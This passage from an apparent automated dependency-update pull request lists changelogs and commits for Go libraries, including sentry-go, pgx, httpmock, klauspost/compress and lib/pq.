href=\"https://github.com/getsentry/sentry-go/commit/91096be62b80b40a2e1d8e62f42115dede34c054\"\u003e\u003ccode\u003e91096be\u003c/code\u003e\u003c/a\u003e chore: pin GitHub Actions to full-length commit SHAs (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1230\"\u003e#1230\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/df391b0baee60760635a948da32e82e362d7a84e\"\u003e\u003ccode\u003edf391b0\u003c/code\u003e\u003c/a\u003e feat: add RemoveAttribute api on the scope (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1224\"\u003e#1224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/340c142cf974aaba7dcb6545101fe125a7d8ad7c\"\u003e\u003ccode\u003e340c142\u003c/code\u003e\u003c/a\u003e fix: TestAsyncTransport_SendEnvelope flakiness (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1226\"\u003e#1226\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/e561a25fe7f0b594a005138bf71db4fd12faacf3\"\u003e\u003ccode\u003ee561a25\u003c/code\u003e\u003c/a\u003e build: Bump getsentry/craft to 2.24.1 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1225\"\u003e#1225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/259b20563d61c7da69d8d83361427e1a8bbd873a\"\u003e\u003ccode\u003e259b205\u003c/code\u003e\u003c/a\u003e feat: add support for homogenous arrays (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1203\"\u003e#1203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/bf26e9a107879c566124e27d5af51bd1851428d1\"\u003e\u003ccode\u003ebf26e9a\u003c/code\u003e\u003c/a\u003e fix: fix flaky TestAsyncTransport_FlushWithContext (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1222\"\u003e#1222\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d1edaf4192ea39be6e16ec5145ded927adfed9e9\"\u003e\u003ccode\u003ed1edaf4\u003c/code\u003e\u003c/a\u003e chore(ai): Add AGENTS.md and testing guidelines (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1216\"\u003e#1216\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-go/compare/v0.34.1...v0.44.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jackc/pgx/v5` from 5.7.5 to 5.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jackc/pgx/blob/master/CHANGELOG.md\"\u003egithub.com/jackc/pgx/v5's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.9.1 (March 22, 2026)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix: batch result format corruption when using cached prepared statements (reported by Dirkjan Bussink)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.9.0 (March 21, 2026)\u003c/h1\u003e\n\u003cp\u003eThis release includes a number of new features such as SCRAM-SHA-256-PLUS support, OAuth authentication support, and\nPostgreSQL protocol 3.2 support.\u003c/p\u003e\n\u003cp\u003eIt significantly reduces the amount of network traffic when using prepared statements (which are used automatically by\ndefault) by avoiding unnecessary Describe Portal messages. This also reduces local memory usage.\u003c/p\u003e\n\u003cp\u003eIt also includes multiple fixes for potential DoS due to panic or OOM if connected to a malicious server that sends\ndeliberately malformed messages.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Go 1.25+\u003c/li\u003e\n\u003cli\u003eAdd SCRAM-SHA-256-PLUS support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eAdd OAuth authentication support for PostgreSQL 18 (David Schneider)\u003c/li\u003e\n\u003cli\u003eAdd PostgreSQL protocol 3.2 support (Dirkjan Bussink)\u003c/li\u003e\n\u003cli\u003eAdd tsvector type support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eSkip Describe Portal for cached prepared statements reducing network round trips\u003c/li\u003e\n\u003cli\u003eMake LoadTypes query easier to support on \u0026quot;postgres-like\u0026quot; servers (Jelte Fennema-Nio)\u003c/li\u003e\n\u003cli\u003eDefault empty user to current OS user matching libpq behavior (ShivangSrivastava)\u003c/li\u003e\n\u003cli\u003eOptimize LRU statement cache with custom linked list and node pooling (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize date scanning by replacing regex with manual parsing (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize pgio append/set functions with direct byte shifts (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eMake RowsAffected faster (Abhishek Chanda)\u003c/li\u003e\n\u003cli\u003eFix: Pipeline.Close panic when server sends multiple FATAL errors (Varun Chawla)\u003c/li\u003e\n\u003cli\u003eFix: ContextWatcher goroutine leak (Hank Donnay)\u003c/li\u003e\n\u003cli\u003eFix: stdlib discard connections with open transactions in ResetSession (Jeremy Schneider)\u003c/li\u003e\n\u003cli\u003eFix: pipelineBatchResults.Exec silently swallowing lastRows error\u003c/li\u003e\n\u003cli\u003eFix: ColumnTypeLength using BPCharArrayOID instead of BPCharOID\u003c/li\u003e\n\u003cli\u003eFix: TSVector text encoding returning nil for valid empty tsvector\u003c/li\u003e\n\u003cli\u003eFix: wrong error messages for Int2 and Int4 underflow\u003c/li\u003e\n\u003cli\u003eFix: Numeric nil Int pointer dereference with Valid: true\u003c/li\u003e\n\u003cli\u003eFix: reversed strings.ContainsAny arguments in Numeric.ScanScientific\u003c/li\u003e\n\u003cli\u003eFix: message length parsing on 32-bit platforms\u003c/li\u003e\n\u003cli\u003eFix: FunctionCallResponse.Decode mishandling of signed result size\u003c/li\u003e\n\u003cli\u003eFix: returning wrong error in configTLS when DecryptPEMBlock fails (Maxim Motyshen)\u003c/li\u003e\n\u003cli\u003eFix: misleading ParseConfig error when default_query_exec_mode is invalid (Skarm)\u003c/li\u003e\n\u003cli\u003eFix: missed Unwatch in Pipeline error paths\u003c/li\u003e\n\u003cli\u003eClarify too many failed acquire attempts error message\u003c/li\u003e\n\u003cli\u003eBetter error wrapping with context and SQL statement (Aneesh Makala)\u003c/li\u003e\n\u003cli\u003eEnable govet and ineffassign linters (Federico Guerinoni)\u003c/li\u003e\n\u003cli\u003eGuard against various malformed binary messages (arrays, hstore, multirange, protocol messages)\u003c/li\u003e\n\u003cli\u003eFix various godoc comments (ferhat elmas)\u003c/li\u003e\n\u003cli\u003eFix typos in comments (Oleksandr Redko)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.8.0 (December 26, 2025)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/4e4eaedb47b7b3cfba0a1b0a9e6a3f015764f046\"\u003e\u003ccode\u003e4e4eaed\u003c/code\u003e\u003c/a\u003e Release v5.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/62731882651a90348febb43b2119b5f8bd9272de\"\u003e\u003ccode\u003e6273188\u003c/code\u003e\u003c/a\u003e Fix batch result format corruption when using cached prepared statements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f7b90c2f1ac099f00e67d6d4d0fee6deb330bc94\"\u003e\u003ccode\u003ef7b90c2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jackc/pgx/issues/2524\"\u003e#2524\u003c/a\u003e from dbussink/pipeline-result-format-reuse\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/3ce6d75be4baa8d1e4b4f880da5f9ad68ab14e7f\"\u003e\u003ccode\u003e3ce6d75\u003c/code\u003e\u003c/a\u003e Add failing test: batch scan corrupted in cache_statement mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/b4d8e62b6616d0c09c5021500363de0c56e01631\"\u003e\u003ccode\u003eb4d8e62\u003c/code\u003e\u003c/a\u003e Release v5.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/c227cd4f76fa2b1a47c0156621e05c076f4cf5c9\"\u003e\u003ccode\u003ec227cd4\u003c/code\u003e\u003c/a\u003e Bump minimum Go version from 1.24 to 1.25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f492c14836d7d442e8103b09f2c0c74a80c56347\"\u003e\u003ccode\u003ef492c14\u003c/code\u003e\u003c/a\u003e Use reflect.TypeFor instead of reflect.TypeOf for static types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/ad8fb08d3f1a36c0e475c9f80dc9bb19d075d8e2\"\u003e\u003ccode\u003ead8fb08\u003c/code\u003e\u003c/a\u003e Use sync.WaitGroup.Go to simplify goroutine spawning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/303377376df43ba3d1a99728eaa9f9a6bcaab767\"\u003e\u003ccode\u003e3033773\u003c/code\u003e\u003c/a\u003e Remove go1.26 build tag from synctest test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/83ffb3c2220737cf11c7dd88c80be9166753102f\"\u003e\u003ccode\u003e83ffb3c\u003c/code\u003e\u003c/a\u003e Validate multirange element count against source length before allocating\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jackc/pgx/compare/v5.7.5...v5.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jarcoal/httpmock` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jarcoal/httpmock/releases\"\u003egithub.com/jarcoal/httpmock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003etest: also test with go v1.25 and use golangci-lint v2.4.0 by \u003ca href=\"https://github.com/maxatome\"\u003e\u003ccode\u003e@​maxatome\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/164\"\u003ejarcoal/httpmock#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid data race when closing body by \u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e made his first contribution in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ehttps://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/314d58a0690c92c71b2a9de2d62d52c74c328546\"\u003e\u003ccode\u003e314d58a\u003c/code\u003e\u003c/a\u003e fix: protect all body-related methods with mutext\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/e482896659149810cdc8b9262611a0059150b661\"\u003e\u003ccode\u003ee482896\u003c/code\u003e\u003c/a\u003e fix: avoid data race when closing body\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/c97714566220b6410cf4f7937db771d1876e8e98\"\u003e\u003ccode\u003ec977145\u003c/code\u003e\u003c/a\u003e test: also test with go v1.25 and use golangci-lint v2.4.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/klauspost/compress` from 1.18.0 to 1.18.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/klauspost/compress/releases\"\u003egithub.com/klauspost/compress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.18.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix crash when changing encoder dictionary with same ID by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1135\"\u003eklauspost/compress#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Default to full zero frames by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1134\"\u003eklauspost/compress#1134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: Clean up histogram order by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1133\"\u003eklauspost/compress#1133\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egzhttp: Add zstandard to server handler wrapper by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1121\"\u003eklauspost/compress#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add ResetWithOptions to encoder/decoder by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1122\"\u003eklauspost/compress#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: preserve qvalue when extra parameters follow in Accept-Encoding by \u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ethaizone\"\u003e\u003ccode\u003e@​ethaizone\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1124\"\u003eklauspost/compress#1124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/zwass\"\u003e\u003ccode\u003e@​zwass\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1125\"\u003eklauspost/compress#1125\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.3\u003c/h2\u003e\n\u003cp\u003eDownstream CVE-2025-61728\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://redirect.github.com/golang/go/issues/77102\"\u003egolang/go#77102\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eflate: Fix invalid encoding on level 9 with single value input by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1115\"\u003eklauspost/compress#1115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: reduce stateless allocations by \u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3.30.5 to 4.31.2 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1111\"\u003eklauspost/compress#1111\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev1.18.1\u003c/code\u003e is marked \u0026quot;retracted\u0026quot; due to invalid flate/zip/gzip encoding.\u003c/p\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix incorrect buffer size in dictionary encodes by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1059\"\u003eklauspost/compress#1059\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003es2: check for cap, not len of buffer in EncodeBetter/Best by \u003ca href=\"https://github.com/vdarulis\"\u003e\u003ccode\u003e@​vdarulis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1080\"\u003eklauspost/compress#1080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add simple zstd EncodeTo/DecodeTo functions by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1079\"\u003eklauspost/compress#1079\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezlib: Avoiding extra allocation in zlib.reader.Reset by \u003ca href=\"https://github.com/travelpolicy\"\u003e\u003ccode\u003e@​travelpolicy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1086\"\u003eklauspost/compress#1086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: remove redundant err check in zstdReader by \u003ca href=\"https://github.com/ryanfowler\"\u003e\u003ccode\u003e@​ryanfowler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1090\"\u003eklauspost/compress#1090\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c5e0077f50a3268a27b02816adc48ebfb535c65e\"\u003e\u003ccode\u003ec5e0077\u003c/code\u003e\u003c/a\u003e zstd: Fix encoder changing dictionary with same ID (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1135\"\u003e#1135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/fd3f23e2d1d0fca18f38ee2dfedb73d0ca5b02e5\"\u003e\u003ccode\u003efd3f23e\u003c/code\u003e\u003c/a\u003e zstd: Default to full zero frames (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1134\"\u003e#1134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/8233c587ef6e7b0f5168bfc08e63ea37e97b2d36\"\u003e\u003ccode\u003e8233c58\u003c/code\u003e\u003c/a\u003e flate: Clean up histogram order (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1133\"\u003e#1133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/bcf0d1289c8df01178af919dd5d8ff83afaa5471\"\u003e\u003ccode\u003ebcf0d12\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1132\"\u003e#1132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/cf758fe1c54e3049f302474d2a98afd3acc1a884\"\u003e\u003ccode\u003ecf758fe\u003c/code\u003e\u003c/a\u003e ci: Upgrade Go versions, clean up (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1130\"\u003e#1130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/77cc5203de2eb0034a63eace182bb28aa869cb83\"\u003e\u003ccode\u003e77cc520\u003c/code\u003e\u003c/a\u003e Add v1.18.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c03560f58ab1f595f17838b482483849d585d0c2\"\u003e\u003ccode\u003ec03560f\u003c/code\u003e\u003c/a\u003e zstd: Add ResetWithOptions to encoder/decoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/0874ab860fc90779cb032996aee0c9e11880738c\"\u003e\u003ccode\u003e0874ab8\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1126\"\u003e#1126\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4a368369aa67e1da850e9a38fbbbea7c20cfd377\"\u003e\u003ccode\u003e4a36836\u003c/code\u003e\u003c/a\u003e doc: Clarify documentation in readme (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1125\"\u003e#1125\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4309644706928691448da21eaa03895b982e086c\"\u003e\u003ccode\u003e4309644\u003c/code\u003e\u003c/a\u003e zstd: document concurrency option handling in encoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1124\"\u003e#1124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.0...v1.18.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/lib/pq` from 1.10.9 to 1.12.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/releases\"\u003egithub.com/lib/pq's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSend datestyle startup parameter, improving compatbility with database engines that use a different default datestyle such as EnterpriseDB (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1312\"\u003elib/pq#1312\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat io.ErrUnexpectedEOF as driver.ErrBadConn so database/sql discards the connection. Since v1.12.0 this could result in permanently broken connections, especially with CockroachDB which frequently sends partial messages (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1299\"\u003elib/pq#1299\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e. See \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are simple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which is \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\r\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, 